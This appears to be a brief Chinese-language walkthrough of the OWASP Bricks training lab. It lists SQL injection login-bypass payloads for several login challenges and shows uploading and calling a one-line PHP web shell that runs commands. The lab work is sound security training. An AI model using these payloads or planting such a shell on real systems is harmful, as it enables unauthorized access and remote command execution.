简介
下载:https://sourceforge.net/projects/owaspbwa/files/
GitHub: https://github.com/chuckfw/owaspbwa/wiki/UserGuide
0x001 login #1
burp拦截修改提交 检查注入
username=test'&passwd=test'&submit=Submit
#SQL Query: SELECT * FROM users WHERE name='test'' and password='test''
burp拦截修改提交绕过登录
username=test' or 1=1-- -&passwd=test&submit=Submit
0x002 Login #2
和login1一样 绕过登录
username=test' or 1=1-- -&passwd=test&submit=Submit
0x003 Login #3
username=test&passwd=test') or 1=1-- -&submit=Submit
0x004 Login #4
#4 #5 #6 同上注入绕过
0x005 Upload #1
上传webshell.php 根据文件路径http://192.168.1.105/owaspbricks/upload-1/uploads/shell.php?cmd=%20id
cat shell.php
<?php system($_GET["cmd"]); ?>